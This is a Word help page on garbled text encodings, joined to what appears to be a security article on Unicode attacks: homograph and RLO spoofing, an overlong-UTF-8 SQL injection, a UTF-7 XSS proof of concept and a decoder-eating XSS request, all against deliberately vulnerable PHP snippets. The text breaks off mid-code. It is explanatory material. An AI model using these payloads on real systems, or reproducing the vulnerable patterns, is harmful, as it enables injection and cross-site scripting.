

"Hieroglyphs" when opening a file: what to do. "Hieroglyphs" (unreadable characters) instead of files on a flash drive


When you open a text file in Microsoft Word or another program (for example, on a computer whose operating system language differs from the language of the text in the file), the encoding helps the program determine how to display the text on the screen so that it can be read.


General information about text encoding

The text you see on the screen is actually stored in a text file as numeric values. The computer translates these numeric values into visible characters, and it uses an encoding standard to do so.

An encoding is a numbering scheme in which each character in a set corresponds to a specific numeric value. An encoding can contain letters, digits, and other characters. Different languages often use different character sets, so many existing encodings are designed to represent the character sets of their respective languages.

Different encodings for different alphabets

The computer uses the encoding information saved with a text file to display the text on the screen. For example, in the "Cyrillic (Windows)" encoding, the character "Й" corresponds to the numeric value 201. When you open a file containing this character on a computer that uses the "Cyrillic (Windows)" encoding, the computer reads the number 201 and displays "Й".

However, if the same file is opened on a computer that uses a different default encoding, the screen shows whatever character corresponds to 201 in that encoding. For example, if the computer uses the "Western European (Windows)" encoding, the "Й" from the Cyrillic source file is displayed as "É", because that is the character that corresponds to 201 in this encoding.
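To make the example concrete, here is a minimal Python sketch. It uses the standard library's `cp1251` codec for "Cyrillic (Windows)" and `cp1252` for "Western European (Windows)". The byte value 201 is the one from the text.

```python
# One stored byte, two interpretations: the number 201 (0xC9) means
# different characters in different single-byte code pages.
stored = bytes([201])

as_cyrillic = stored.decode("cp1251")  # "Cyrillic (Windows)"
as_western = stored.decode("cp1252")   # "Western European (Windows)"

print(as_cyrillic, as_western)  # Й É
```

The file itself never changes. Only the table used to turn the number back into a character does.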

Unicode: a single encoding for different alphabets

To avoid problems with encoding and decoding text files, you can save them in Unicode. This encoding includes most of the characters from all languages that are commonly used on modern computers.

Because Word is based on Unicode, all its files are automatically saved in this encoding. Unicode files can be opened on any computer with an English-language operating system, regardless of the language of the text. Such a computer can also store Unicode files containing characters not found in Western European alphabets (such as Greek, Cyrillic, Arabic, or Japanese).

Selecting an encoding when opening a file

If the text in an opened file is garbled or displayed as question marks or squares, Word may have detected the encoding incorrectly. You can specify which encoding to use to display (decode) the text.
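The same effect, and its fix, can be reproduced outside Word. In this Python sketch, `guess_decode` and its list of candidate encodings are hypothetical and much cruder than Word's own detection. It simply tries strict UTF-8 first and then falls back to a single-byte code page.

```python
def guess_decode(data: bytes, candidates=("utf-8", "cp1251")) -> tuple[str, str]:
    """Return (text, encoding) for the first candidate that decodes without errors."""
    for enc in candidates:
        try:
            return data.decode(enc), enc
        except UnicodeDecodeError:
            continue  # not valid in this encoding, try the next one
    # Last resort: keep going with replacement characters (U+FFFD)
    return data.decode(candidates[0], errors="replace"), candidates[0]


utf8_bytes = "Привет".encode("utf-8")
wrong = utf8_bytes.decode("cp1251")  # the wrong choice produces garbage
print(wrong)                         # РџСЂРёРІРµС‚
print(guess_decode(utf8_bytes))                  # ('Привет', 'utf-8')
print(guess_decode("Привет".encode("cp1251")))   # ('Привет', 'cp1251')
```

Picking the right encoding does not alter the stored bytes. It only changes how they are read, which is why choosing another encoding in the dialog below can repair the display.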

Open the File tab.

Click Options.

Click Advanced.

Scroll to the General section and select the Confirm file format conversion on open check box.

Note: When this check box is selected, Word displays the File Conversion dialog box every time you open a non-Word file (that is, a file without a DOC, DOT, DOCX, DOCM, DOTX, or DOTM extension). If you often work with such files but usually do not need to choose an encoding, be sure to turn this option off so that the dialog box does not appear.

Close and then reopen the file.

In the File Conversion dialog box, select Encoded Text.

In the File Conversion dialog box, select Other and choose the desired encoding from the list.

In the Preview area, you can view the text and check whether it is displayed correctly in the selected encoding.

If almost all text looks the same (like squares or dots), your computer may not have the correct font installed. In this case, you can install additional fonts.

To install additional fonts, do the following:

Click the Start button and select Control Panel.

Do one of the following:

In Windows 7 or Windows Vista

In Control Panel, select Uninstall a program.

In the list of programs, click Microsoft Office, or Microsoft Word if it was installed separately from Microsoft Office, and then click Change.

In Windows XP

In Control Panel, click Add or Remove Programs.

In the Currently installed programs list, click Microsoft Office, or Microsoft Word if it was installed separately from Microsoft Office, and then click Change.

In the Change your installation of Microsoft Office group, click Add or Remove Features, and then click Continue.

Under Installation Options, expand Office Shared Features, and then Multilingual Support.

Select the font you want, click the arrow next to it, and select Run from My Computer.

Tip: When it opens a text file in a particular encoding, Word uses the fonts defined in the Web Document Options dialog box. (To open this dialog box, click the Microsoft Office Button, click Word Options, and select the Advanced category. Under General, click Web Document Options.) On the Fonts tab of the Web Document Options dialog box, you can set the font for each encoding.

Choosing an encoding when saving a file

If you do not select an encoding when saving the file, Unicode will be used. As a general rule, Unicode is recommended because it supports most characters in most languages.

If you plan to open the document in a program that does not support Unicode, you can select the required encoding. For example, on an English-language operating system you can create a Chinese (Traditional) document in Unicode. However, if the document will be opened in a program that supports Chinese but not Unicode, you can save the file in the "Chinese Traditional (Big5)" encoding. The text will then display correctly when the document is opened in a program that supports Traditional Chinese.

Note: Since Unicode is the most complete standard, some characters may not be displayed when saving text in other encodings. Suppose, for example, that a Unicode document contains both Hebrew and Cyrillic text. If you save the file in "Cyrillic (Windows)" encoding, Hebrew text will not be displayed, and if you save it in "Hebrew (Windows)" encoding, Cyrillic text will not be displayed.
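The Hebrew-plus-Cyrillic case can be checked with Python's built-in codecs: `cp1251` is "Cyrillic (Windows)" and `cp1255` is "Hebrew (Windows)". `can_store` is a hypothetical helper written for this sketch. The Hebrew word is written with escapes so the right-to-left text does not scramble the source.

```python
def can_store(text: str, encoding: str) -> bool:
    """True if every character of `text` exists in `encoding`."""
    try:
        text.encode(encoding)
        return True
    except UnicodeEncodeError:
        return False


# "שלום / Привет": Hebrew and Cyrillic in one Unicode string
text = "\u05e9\u05dc\u05d5\u05dd / Привет"

print(can_store(text, "utf-8"))    # True: Unicode keeps both scripts
print(can_store(text, "cp1251"))   # False: no Hebrew in "Cyrillic (Windows)"
print(can_store(text, "cp1255"))   # False: no Cyrillic in "Hebrew (Windows)"

# Forcing the save anyway: the missing characters turn into "?"
print(text.encode("cp1251", errors="replace").decode("cp1251"))  # ???? / Привет
```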

If you choose an encoding standard that doesn't support some of the characters in the file, Word will mark them in red. You can preview the text in the selected encoding before saving the file.

Saving a file as encoded text removes the text for which the Symbol font is selected, as well as field codes.

Encoding selection

To use the standard encoding, select Windows (Default).

To use the MS-DOS encoding, select MS-DOS.

To specify a different encoding, select Other and choose the desired item from the list. In the Preview area, you can view the text and check whether it is displayed correctly in the selected encoding.

Note: You can resize the File Conversion dialog box to enlarge the document preview area.

Open the File tab and click Save As.

In the File name box, enter a name for the new file.

In the Save as type box, select Plain Text.

If the Microsoft Office Word Compatibility Checker dialog box appears, click Continue.

In the File Conversion dialog box, select the appropriate encoding.

If you see the message "The text highlighted in red cannot be stored correctly in the selected encoding", you can select a different encoding or select the Allow character substitution check box.

When character substitution is enabled, characters that cannot be displayed are replaced with the closest equivalent characters in the selected encoding. For example, an ellipsis is replaced with three dots, and angle quotes are replaced with straight ones.

If the selected encoding has no equivalents for the characters highlighted in red, they are saved as out-of-context characters (for example, as question marks).
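Word's actual substitution table is its own. The Python sketch below only imitates the behaviour described above, using a small hypothetical `SUBSTITUTES` table. Characters with a known equivalent get it, and anything else falls back to a question mark through the codec's `errors="replace"` handler.

```python
# Hypothetical "nearest equivalent" table, modelled on the examples in the text
SUBSTITUTES = {
    "\u2026": "...",  # horizontal ellipsis -> three dots
    "\u00ab": '"',    # left angle quote -> straight quote
    "\u00bb": '"',    # right angle quote -> straight quote
    "\u201c": '"',    # left curly quote -> straight quote
    "\u201d": '"',    # right curly quote -> straight quote
}


def encode_with_substitution(text: str, encoding: str) -> bytes:
    out = []
    for ch in text:
        try:
            ch.encode(encoding)
            out.append(ch)                       # representable as-is
        except UnicodeEncodeError:
            out.append(SUBSTITUTES.get(ch, ch))  # nearest equivalent, if known
    # Characters still without an equivalent are stored as "?"
    return "".join(out).encode(encoding, errors="replace")


print(encode_with_substitution("Wait\u2026 \u00abЖ\u00bb", "ascii"))  # b'Wait... "?"'
```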

If the document will be opened in a program that does not wrap text from one line to the next, you can add hard line breaks to the document. To do this, select the Insert line breaks check box and choose the break character (carriage return (CR), line feed (LF), or both) in the End lines with box.

Finding encodings available in Word

Word recognizes several encodings and supports encodings that are included with the system software.

Below is a list of scripts and their associated encodings (code pages).

| Writing system | Encodings | Font used |
|---|---|---|
| Multilingual | Unicode (UCS-2 little-endian and big-endian, UTF-8, UTF-7) | Default font of the Normal style in the localized version of Word |
| Arabic | Windows 1256, ASMO 708 | |
| Chinese (Simplified) | GB2312, GBK, EUC-CN, ISO-2022-CN, HZ | |
| Chinese (Traditional) | BIG5, EUC-TW, ISO-2022-TW | |
| Cyrillic | Windows 1251, KOI8-R, KOI8-RU, ISO8859-5, DOS 866 | |
| English, Western European, and other Latin-script languages | Windows 1250, 1252-1254, 1257, ISO8859-x | |
| Greek | | |
| Japanese | Shift-JIS, ISO-2022-JP (JIS), EUC-JP | |
| Korean | Wansung, Johab, ISO-2022-KR, EUC-KR | |
| Vietnamese | | |
| Indian: Tamil | | |
| Indian: Nepali | ISCII 57002 (Devanagari) | |
| Indian: Konkani | ISCII 57002 (Devanagari) | |
| Indian: Hindi | ISCII 57002 (Devanagari) | |
| Indian: Assamese | | |
| Indian: Bengali | | |
| Indian: Gujarati | | |
| Indian: Kannada | | |
| Indian: Malayalam | | |
| Indian: Oriya | | |
| Indian: Marathi | ISCII 57002 (Devanagari) | |
| Indian: Punjabi | | |
| Indian: Sanskrit | ISCII 57002 (Devanagari) | |
| Indian: Telugu | | |

To use Indic languages, the operating system must support them and appropriate OpenType fonts must be installed.

Only limited support is available for Nepali, Assamese, Bengali, Gujarati, Malayalam and Oriya.

I think you have run into Unicode-related exploits more than once, hunted for the right encoding to display a page, and "enjoyed" yet another batch of krakozyabry (garbled characters) here and there. You never know what else! If you want to know who started this whole mess and is still keeping it going, fasten your seat belts and read on.

As they say, "the initiative is punishable" and, as always, the Americans were to blame for everything.

It went like this. At the dawn of the computer industry and the spread of the Internet, a universal system for representing characters was needed. In the 1960s, ASCII (American Standard Code for Information Interchange) appeared: the familiar 7-bit character encoding. The eighth bit was left unused so that the ASCII table could be adapted to the needs of computer buyers in a particular region; it let each language extend the table with its own characters. Computers were shipped to many countries, each of which already used its own modified table. Later, however, this feature became a headache, because exchanging data between computers turned into a real problem. The new 8-bit code pages were incompatible with each other, and the same code could mean several different characters. To solve this problem, ISO (the International Organization for Standardization) proposed a new table, ISO 8859.

Later, ISO went further with a universal standard, UCS (Universal Character Set, ISO/IEC 10646). However, by the time UCS was first released, Unicode had already appeared. Since the goals of the two standards coincided, their creators decided to join forces. Unicode took on the daunting task of giving every character a unique designation. At the time of writing, the latest version of Unicode is 5.2.

I want to warn you: the history of encodings is actually very murky. Different sources give different facts, so don't get hung up on details. Just be aware of how everything took shape, and follow modern standards. We are not historians, I hope.

Unicode crash course

Before delving into the topic, I would like to clarify what Unicode is in technical terms. We already know the goals of this standard; all that remains is to brush up on the fundamentals.

So what is Unicode? Simply put, it is a way to represent any character of any of the world's languages as a specific code. The latest version of the standard has room for about 1,100,000 codes, occupying the space from U+0000 to U+10FFFF. But be careful here: Unicode strictly separates what a character's code is from how that code is represented in memory. A character code (say, 0041 for the character "A") says nothing about bytes by itself. Turning these codes into bytes is the job of encodings. The Unicode Consortium offers the following encodings, called UTF (Unicode Transformation Formats):

- UTF-7: This encoding is not recommended for security and compatibility reasons. Described in RFC 2152. Not part of Unicode, but introduced by this consortium.

- UTF-8: The most common encoding on the web. It has a variable width of 1 to 4 bytes and is backward compatible with protocols and programs that use ASCII: characters in the range U+0000 to U+007F are encoded as a single byte, identical to ASCII.

- UTF-16: Uses a variable width of 2 to 4 bytes; most characters take 2 bytes. UCS-2 is the same encoding but with a fixed width of 2 bytes, so it is limited to the BMP.

- UTF-32: Uses a fixed width of 4 bytes, i.e. 32 bits. Only 21 of those bits are actually needed; the remaining 11 are always zero. Although this encoding wastes space, it is considered the fastest, because every character has the same width and fits a 32-bit machine word.

The closest equivalent of UTF-32 is UCS-4, which is less commonly used today.
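The split between a code point and its bytes is easy to see with Python's built-in codecs. The `-le` variants are used so that no byte order mark is added to the output. The sample characters are an arbitrary choice for this sketch.

```python
# The code point is fixed; the number of bytes depends on the UTF chosen.
samples = ["A", "Й", "€", "\U0001F600"]  # U+0041, U+0419, U+20AC, U+1F600

for ch in samples:
    sizes = {enc: len(ch.encode(enc)) for enc in ("utf-8", "utf-16-le", "utf-32-le")}
    print(f"U+{ord(ch):04X}", sizes)

# U+0041 {'utf-8': 1, 'utf-16-le': 2, 'utf-32-le': 4}
# U+0419 {'utf-8': 2, 'utf-16-le': 2, 'utf-32-le': 4}
# U+20AC {'utf-8': 3, 'utf-16-le': 2, 'utf-32-le': 4}
# U+1F600 {'utf-8': 4, 'utf-16-le': 4, 'utf-32-le': 4}
```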

Although UTF-8 and UTF-32 could in principle represent a little more than two billion characters, the code space was limited to a little over a million for the sake of compatibility with UTF-16. The entire code space is divided into 17 planes of 65,536 code points each. The most frequently used characters are in plane 0, the Basic Multilingual Plane (BMP).
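The arithmetic behind the planes, and the reason UTF-16 caps the range, can be checked in a few lines of Python. The helper names are hypothetical. The surrogate formula is the standard UTF-16 one: subtract 0x10000 from a code point above the BMP, then split the remaining 20 bits into a high surrogate (0xD800 plus the top 10 bits) and a low surrogate (0xDC00 plus the bottom 10 bits). Twenty bits cover exactly 16 planes, which together with the BMP gives 17.

```python
PLANE_SIZE = 0x10000       # 65,536 code points per plane
TOTAL = 17 * PLANE_SIZE    # 1,114,112 = 0x110000, i.e. U+0000..U+10FFFF


def plane(cp: int) -> int:
    return cp // PLANE_SIZE  # plane 0 is the BMP


def utf16_surrogates(cp: int) -> tuple[int, int]:
    """Split a code point above the BMP into a UTF-16 high/low surrogate pair."""
    assert PLANE_SIZE <= cp < TOTAL
    v = cp - PLANE_SIZE      # 20 bits remain
    return 0xD800 + (v >> 10), 0xDC00 + (v & 0x3FF)


print(hex(TOTAL), plane(0x0419), plane(0x1F600))    # 0x110000 0 1
print([hex(u) for u in utf16_surrogates(0x1F600)])  # ['0xd83d', '0xde00']
```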

A data stream in UTF-16 or UTF-32 can be stored in two byte orders, little-endian and big-endian, called UTF-16LE/UTF-32LE and UTF-16BE/UTF-32BE respectively. As you have guessed, LE stands for little-endian and BE for big-endian. A reader, of course, has to be able to tell these orders apart. For that purpose the byte order mark U+FEFF (BOM, "Byte Order Mark") is used. A BOM may also appear in UTF-8, but there it says nothing about byte order; it only marks the text as UTF-8.
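Here is a minimal BOM sniffer, assuming the stream really starts with U+FEFF. `detect_bom` is a hypothetical helper, while the `codecs.BOM_*` constants are part of Python's standard library. It is only a heuristic: a UTF-16LE stream whose first character after the BOM is U+0000 would be mistaken for UTF-32LE. Python calls UTF-8 with a BOM `utf-8-sig`.

```python
import codecs
from typing import Optional

# Longer marks first: the UTF-32LE BOM (FF FE 00 00) begins with the UTF-16LE one
BOMS = [
    (codecs.BOM_UTF32_LE, "utf-32-le"),
    (codecs.BOM_UTF32_BE, "utf-32-be"),
    (codecs.BOM_UTF8, "utf-8-sig"),
    (codecs.BOM_UTF16_LE, "utf-16-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
]


def detect_bom(data: bytes) -> Optional[str]:
    """Return the encoding announced by a leading U+FEFF, or None if there is no BOM."""
    for bom, name in BOMS:
        if data.startswith(bom):
            return name
    return None


text = "\ufeffAB"  # U+FEFF written at the start of the stream
print(text.encode("utf-16-le"))              # b'\xff\xfeA\x00B\x00'
print(text.encode("utf-16-be"))              # b'\xfe\xff\x00A\x00B'
print(detect_bom(text.encode("utf-16-be")))  # utf-16-be
```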

For the sake of backward compatibility, Unicode had to accommodate characters from existing encodings. That creates another problem: the same character can often be encoded in several different ways, and these variants have to be handled somehow. This is why so-called normalization is needed. Only after normalization can two strings be compared reliably. There are four normalization forms in total:

- Normalization Form D (NFD): canonical decomposition.

- Normalization Form C (NFC): canonical decomposition + canonical composition.

- Normalization Form KD (NFKD): compatibility decomposition.

- Normalization Form KC (NFKC): compatibility decomposition + canonical composition.

Now more about these strange words.

Unicode defines two kinds of string equivalence: canonical and compatibility.

Canonical equivalence links a composite character with the sequence of separate parts that together form it (for example, "é" as one code point and "e" followed by a combining acute accent). Compatibility equivalence is looser: it matches a character with its nearest plain counterpart (for example, the ligature "ﬁ" and the letters "fi"). Composition joins the parts into a single character, and decomposition is the reverse operation. Look at the picture, and everything will fall into place.
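Python's standard `unicodedata.normalize` implements the four forms, so the two kinds of equivalence can be tried directly. The characters below are just illustrative picks.

```python
import unicodedata

precomposed = "\u00e9"  # "é" as a single code point
decomposed = "e\u0301"  # "e" + COMBINING ACUTE ACCENT

# Canonical equivalence: different code points, same character
print(precomposed == decomposed)                                # False
print(unicodedata.normalize("NFC", decomposed) == precomposed)  # True
print(len(unicodedata.normalize("NFD", precomposed)))           # 2

# Compatibility equivalence: only the K forms fold the ligature
ligature = "\ufb01"  # LATIN SMALL LIGATURE FI
print(unicodedata.normalize("NFC", ligature) == ligature)       # True
print(unicodedata.normalize("NFKC", ligature))                  # fi
```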

For security reasons, normalization should be performed before the string is passed to any filters. Note that this operation can change the length of the text, which may have negative consequences; more on that later.
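The sketch below shows why the order matters. `naive_filter` is a hypothetical blacklist check, and the payload uses the fullwidth less-than and greater-than signs, which NFKC folds into ordinary `<` and `>`. The last line illustrates the length change mentioned above.

```python
import unicodedata


def naive_filter(s: str) -> bool:
    """Hypothetical blacklist check: reject anything containing '<script'."""
    return "<script" not in s.lower()


payload = "\uff1cscript\uff1e"  # FULLWIDTH LESS-THAN SIGN ... FULLWIDTH GREATER-THAN SIGN

print(naive_filter(payload))                   # True: slips through unnormalized
normalized = unicodedata.normalize("NFKC", payload)
print(normalized, naive_filter(normalized))    # <script> False

# Normalization can also change the length of the text
print(len("\ufb03"), len(unicodedata.normalize("NFKC", "\ufb03")))  # 1 3
```

Normalizing first and filtering the result closes this particular hole. Filtering first and normalizing later reopens it.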

That is all for the theory. I haven't covered much yet, but I hope I haven't missed anything important. Unicode is unimaginably vast and complex, and thick books are published about it. Explaining the foundations of such a cumbersome standard concisely, clearly, and completely is very hard. In any case, for a deeper understanding, follow the links in the sidebar. Now that the picture of Unicode is more or less clear, we can move on.

Visual deception

You have surely heard of IP/ARP/DNS spoofing and have a good idea of what it is. But there is also so-called "visual spoofing", the same old method that phishers actively use to deceive victims. It relies on look-alike characters, such as "o" and "0" or "5" and "s". This is the most common and simplest variant, and also the easiest to notice. An example is the PayPal phishing attack of 2000, which is even mentioned on the www.unicode.org pages. However, this has little to do with our Unicode topic.

For more advanced attackers, Unicode appeared on the horizon, or rather IDN (Internationalized Domain Names). IDN allows national alphabet characters in domain names. Registrars market it as a convenience: type the domain name in your own language! However, this convenience is highly questionable. Well, marketing is not our topic. But imagine what a playground it is for phishers, SEO spammers, cybersquatters, and other evil spirits. I am talking about an effect called IDN spoofing. This attack belongs to the visual spoofing category. In English-language literature it is also called a "homograph attack", that is, an attack that uses homographs (words that look identical when written).

True, when typing an address by hand, nobody will accidentally type a deliberately fake domain. But most of the time users click links. If you want to see how effective and simple the attack is, look at the picture.
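One common defence is to flag labels that mix scripts. The Python sketch below is a rough approximation that takes the script from the first word of each letter's Unicode name via `unicodedata.name`. The helper names are hypothetical, and browsers apply more elaborate rules.

```python
import unicodedata


def scripts(label: str) -> set[str]:
    """Rough script detection: first word of each letter's Unicode name."""
    return {unicodedata.name(ch).split()[0] for ch in label if ch.isalpha()}


def looks_mixed(label: str) -> bool:
    return len(scripts(label)) > 1


genuine = "paypal"
spoofed = "p\u0430ypal"  # the second letter is CYRILLIC SMALL LETTER A

print(genuine == spoofed)                         # False, yet they render alike
print(sorted(scripts(spoofed)))                   # ['CYRILLIC', 'LATIN']
print(looks_mixed(genuine), looks_mixed(spoofed))  # False True
```

This check does nothing against a domain written entirely in look-alike Cyrillic letters. That is one reason the problem is hard to solve for good.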

IDNA2003 was intended as a kind of panacea, but this year, 2010, IDNA2008 came into force. The new protocol was supposed to solve many problems of the young IDNA2003, but it opened up new opportunities for spoofing attacks. Compatibility issues arise again: in some cases, the same address can lead to different servers in different browsers. The reason is that a Unicode name can be converted to Punycode differently in different browsers, depending on which version of the specification they support.
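A classic illustration of the incompatibility is the German "ß". Python's built-in `idna` codec implements IDNA2003 (RFC 3490), whose Nameprep step maps "ß" to "ss". IDNA2008 keeps "ß" as a real letter, so the label gets Punycode-encoded instead. The sketch approximates the IDNA2008 result with the raw `punycode` codec. That is adequate for this one lowercase label, but it is not a full IDNA2008 implementation.

```python
domain = "faß.de"

# IDNA2003 (Python's built-in codec): Nameprep folds "ß" into "ss"
idna2003 = domain.encode("idna")

# IDNA2008 keeps "ß"; approximated here by Punycode-encoding the label directly
label, tld = domain.split(".")
idna2008 = b"xn--" + label.encode("punycode") + b"." + tld.encode("ascii")

print(idna2003)  # b'fass.de'
print(idna2008)  # b'xn--fa-hia.de'
```

Two different ASCII names come out, and they may well belong to two different owners.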

The problem of visual deception does not end there. Unicode also helps spammers get past spam filters. They run the original messages through a Unicode obfuscator that swaps characters for look-alikes from other national alphabets, using the so-called UC-SimList ("Unicode Similarity List", a list of similar Unicode characters). And that's it! The anti-spam filter fails and can no longer recognize anything meaningful in such a jumble of characters, while the user can still read the text perfectly well. I don't deny that solutions to this problem have been found, but the spammers are still in the lead. Here is one more attack from the same series: are you sure you are opening a text file and not a binary?

In the figure, as you can see, we have a file called evilexe.txt. But it is a fake! The file is actually called eviltxt.exe, with a hidden character between "evil" and "txt". You may ask what the garbage in brackets is. It is U+202E, RIGHT-TO-LEFT OVERRIDE (RLO), a control character of Bidi (from "bidirectional"), the Unicode algorithm that supports right-to-left languages such as Arabic and Hebrew. Everything that follows an inserted RLO character is displayed in reverse order. A real-life example of this method is a spoofing attack in Mozilla Firefox: cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3376.
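The trick and a simple check against it fit into a short Python sketch. `naive_display` is a deliberately simplified, hypothetical model of the Bidi algorithm (it just reverses everything after RLO). `has_bidi_controls` relies on the standard `unicodedata.bidirectional` function, which returns a character's bidirectional class.

```python
import unicodedata

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE
real_name = "evil" + RLO + "txt.exe"


def naive_display(name: str) -> str:
    """Very simplified model: everything after RLO is shown in reverse order."""
    head, sep, tail = name.partition(RLO)
    return head + tail[::-1] if sep else name


BIDI_CONTROLS = {"LRE", "RLE", "LRO", "RLO", "PDF", "LRI", "RLI", "FSI", "PDI"}


def has_bidi_controls(name: str) -> bool:
    return any(unicodedata.bidirectional(ch) in BIDI_CONTROLS for ch in name)


print(naive_display(real_name))    # evilexe.txt  (what the user sees)
print(real_name.endswith(".exe"))  # True         (what actually runs)
print(has_bidi_controls(real_name), unicodedata.bidirectional(RLO))  # True RLO
```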

Filter Bypass - Step #1

It is well known today that non-shortest (overlong) UTF-8 forms must not be accepted, because they are a potential vulnerability. PHP developers, however, cannot be persuaded of this. Let's see what this bug is. You may remember the problem of incorrect filtering combined with utf8_decode(). Here we will examine this case in more detail. So, we have this PHP code:

// ... step 1: escape the user input

$id = mysql_real_escape_string($_GET['id']);

// ... step 2: convert from UTF-8 to ISO-8859-1

$id = utf8_decode($id);

// ... step 3: the decoded value goes straight into the query

mysql_query("SELECT name FROM deadbeef WHERE id='$id'");

At first glance, everything looks correct. Well, almost: there is an SQL injection here. Suppose we pass the following string:

/index.php?id=%c0%a7 OR 1=1/*

At step 1, the string contains nothing that portends trouble. But step 2 is the key one: the first two bytes of the string are converted into an apostrophe. At step 3 you are already rummaging through the database at will. So what happened at step 2, and why did the characters suddenly change? Let's figure it out; read on carefully.

If you convert %c0 and %a7 to their binary values, you get 11000000 and 10100111 respectively. The apostrophe has the binary value 00100111. Now look at the UTF-8 encoding table.

The leading zeros and ones of each byte indicate the length of the character and which bytes belong to it. Our apostrophe fits into one byte, but we want to stretch it to two bytes (at least; more is possible), that is, to give it the form shown in the second row of the table.

To do this, take a first octet whose first three bits are 110, which tells the decoder that the character is two bytes wide, and fill the rest of it with zeros. The second octet is just as easy: replace the first two bits of the apostrophe (00) with 10, the continuation marker. Voila! We get 11000000 10100111, which is %c0%a7.

You won't run into this vulnerability at every step, but keep in mind that if the functions are called in this order, neither addslashes(), nor mysql_real_escape_string(), nor magic_quotes_gpc will help. Besides apostrophes, many other characters can be hidden this way. Moreover, PHP is not the only software that handles UTF-8 strings incorrectly. Taken together, these factors greatly widen the range of possible attacks.
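The trick can be reproduced in Python. `lenient_decode` below is a hypothetical stand-in for a decoder that, like the utf8_decode() described above, never checks for overlong forms. `escape_quotes` is a hypothetical stand-in for mysql_real_escape_string(). The sketch compares the vulnerable order (escape, then decode) with the safe one (decode, then escape), and shows that Python's own strict UTF-8 decoder rejects the overlong bytes.

```python
def overlong_two_byte(ch: str) -> bytes:
    """Force an ASCII character into the 2-byte pattern 110xxxxx 10xxxxxx."""
    cp = ord(ch)
    return bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])


def lenient_decode(data: bytes) -> str:
    """Hypothetical buggy decoder: accepts overlong 2-byte forms without complaint."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif b >> 5 == 0b110 and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("?")  # longer sequences are outside this sketch
            i += 1
    return "".join(out)


def escape_quotes(data: bytes) -> bytes:
    """Stand-in for mysql_real_escape_string(): backslash-escape apostrophes."""
    return data.replace(b"'", b"\\'")


raw = overlong_two_byte("'") + b" OR 1=1/*"  # b"\xc0\xa7 OR 1=1/*"

print(lenient_decode(escape_quotes(raw)))           # ' OR 1=1/*  (escape, then decode: unsafe)
print(escape_quotes(lenient_decode(raw).encode()))  # b"\\' OR 1=1/*"  (decode, then escape)
try:
    raw.decode("utf-8")  # a strict decoder refuses the overlong form
except UnicodeDecodeError as err:
    print("rejected:", err.reason)
```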

Filter Bypass - Step #2

This type of vulnerability relies on a perfectly legal way of disguising a malicious string: presenting it in a different encoding. Look at the following code:

/**

* UTF-7 XSS PoC

*/

header("Content-Type: text/html; charset=UTF-7");

$str = "<script>alert('UTF-7 XSS');</script>";

$str = mb_convert_encoding($str, "UTF-7");

echo htmlentities($str);

Here is what happens: the first statement sends the browser a header declaring the encoding we need. The next two lines convert the string into this:

+ADw-script+AD4-alert('UTF-7 XSS')+ADsAPA-/script+AD4-

The last line acts as a filter of sorts. A real filter can be more complicated, but this one is enough to show a successful bypass in the most primitive cases. It follows that you should not let the user control the encoding, because even code like this is a potential vulnerability.
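The Python sketch below mirrors the PoC with the standard library. `html.escape` stands in for htmlentities(), with `quote=False` so that only &, < and > are touched (a simplification). The UTF-7 string is the one shown above.

```python
import html

payload = "<script>alert('UTF-7 XSS');</script>"
utf7 = "+ADw-script+AD4-alert('UTF-7 XSS')+ADsAPA-/script+AD4-"

# The "filter": HTML-escape the text; there are no &, < or > left to escape
filtered = html.escape(utf7, quote=False)
print(filtered == utf7)  # True: the filter changed nothing

# A browser told "charset=UTF-7" decodes the same bytes into a live tag
print(filtered.encode("ascii").decode("utf-7") == payload)  # True
```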

If in doubt, throw an error and stop processing. To avoid problems, the right approach is to force output into UTF-8. A well-known real-world case is an attack on Google, where a hacker carried out an XSS attack by manually switching the encoding to UTF-7.

The original description of the attack on Google using this method: sla.ckers.org/forum/read.php?3,3109.

Filter Bypass - Step #3

Unicode warns: excessive consumption of characters is harmful to your security. Let's talk about an effect called "character eating". A decoder that works incorrectly, as PHP's does, can be the reason an attack succeeds. The standard says that if an ill-formed sequence is encountered during conversion, the questionable characters should preferably be replaced with question marks or with U+FFFD (the replacement character), or parsing should stop, and so on. Subsequent characters, however, must not be deleted. If you do need to delete a character, do it carefully.

The bug is that PHP swallows an invalid UTF-8 character together with the characters that follow it. This can lead to a filter bypass followed by JavaScript execution, or to SQL injection.

The original vulnerability report on the blog of the hacker Eduardo Vela, aka sirdarckcat, has a very good example. We will look at it, slightly modified. In this scenario, users can add pictures to their profile, and the following code handles them:

// ... a lot of code, filtering ...

$name = $_GET['name'];

$link = $_GET['link'];

// both user-supplied values end up inside quoted attributes of an <img> tag

$image = "<img alt=\"$name\" src=\"http://$link\" />";

echo utf8_decode($image);

And now we send the following request:

/?name=xxx%f6&link=%20src=javascript:onerror=alert(/xss/)//

After all the transformations, PHP will return this to us:

What happened? The $name variable received the invalid UTF-8 byte 0xF6, which, once passed through utf8_decode(), ate the 2 characters after it, including the closing quote. The browser ignored the leftover http://, and the JavaScript code that followed ran successfully. I tested this attack in Opera, but nothing prevents making it universal. This is just a good example of how protection can be bypassed in some cases.
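Here is a simplified Python model of such a greedy decoder. It is hypothetical, not PHP's source code. It trusts the length announced by the lead byte and swallows that many following bytes without checking that they are continuation bytes (10xxxxxx). In this model a 0xF6 lead byte announces a 4-byte sequence, so it eats the three bytes after it, including the quote that closed the attribute. The exact count depends on the decoder.

```python
def greedy_utf8_decode(data: bytes) -> str:
    """Buggy model of a UTF-8 -> Latin-1 decoder that trusts lead bytes blindly."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:              # plain ASCII byte
            out.append(chr(b))
            i += 1
            continue
        if b < 0xC0:              # stray continuation byte
            out.append("?")
            i += 1
            continue
        # Sequence length announced by the lead byte
        length = 4 if b >= 0xF0 else 3 if b >= 0xE0 else 2
        cp = b & (0x7F >> length)  # payload bits of the lead byte
        for cont in data[i + 1:i + length]:
            cp = (cp << 6) | (cont & 0x3F)  # BUG: never checks for the 10xxxxxx marker
        out.append(chr(cp) if cp <= 0xFF else "?")  # Latin-1 output, "?" otherwise
        i += length               # the following bytes are swallowed
    return "".join(out)


html_bytes = b'<img alt="xxx\xf6" src="http://' + b' src=javascript:alert(1)//">'

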